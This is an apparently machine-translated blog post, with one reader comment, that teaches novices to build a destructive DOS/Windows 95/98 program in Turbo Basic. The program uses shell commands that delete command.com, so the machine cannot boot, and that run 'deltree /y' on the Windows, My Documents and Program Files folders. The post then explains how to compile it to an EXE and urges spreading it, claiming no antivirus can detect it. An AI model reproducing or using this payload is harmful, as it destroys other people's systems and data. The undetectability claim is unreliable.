How to create a destructive program

Authors concerned with the newbie who is learning programming as well as the author also
concerned with the progammer who are not familiar with BASIC language (mostly understandable progammer the direct jump to Pascal, C and others).

Destroyer program (such as a virus) is the desire most computer novices,
but how they could make if they do not know the programming language at all,
you are not anxious for this problem because the current writers will teach you how to
destroyer program (such as viruses) are very simple but very deadly
could even say more dreadful than any destroyer program.

First skill you need is a DOS base, without it you will be hard to
creative in making this program but if you do not know the basic DOS commands you
just copy paste it, the programming language we will use the Turbo Basic v1.0, you
can download it on Google or search dirental CD.

If you are blind Turbo Basic programming then you go to Edit and then you write Source Code
destroyer program.

shell "DOS Command"

the beginning said shell then you can run DOS commands on the program, for example your
make:

shell "c:"
shell "cd \"
shell "del command.com"

Above is an example of deleting Classic DOS with DOS, Windows 95/98, allowing users
the computer can not boot, we demonstrated the others.

shell "c:"
shell "cd \"
shell "deltree / y mydocu ~ 1"
shell "deltree / y windows"
shell "deltree / y progra ~ 1"

Above is an example of deleting Directory My Document, Windows and Program Files, so fatal is not it?

Once you have finished making program then you save first, how to select File and then Save
then name the file eg VIRUS.BAS, only then we compile the source code earlier,
how to select Options and select Compile to EXE files, after it went into compiling options
then you enter, the source code will be EXE file.

If the EXE file is run then your computer will run at the DOS command
program, from the tutorial above, you can create for yourself how your artificial virus
can be run in accordance with your wish, please note that NO ONE THERE ANTIVIRUS
In this world CAN THIS PROGRAM DETECTING VIRUSES ARE copied so you are free programs
this to any computer unless you like non-DOS-based computer or Windows, hehe

The purpose of this tutorial is to make us more aware of the various files with
although the extension *. exe *. exe files are 100% virus-free expressed from various
Antivirus type.

Comments

One response to “How to create a destructive program”

Anonymous said...
March 23, 2010 at 4:26 AM

Nice post....
thx for sharing....

Post a Comment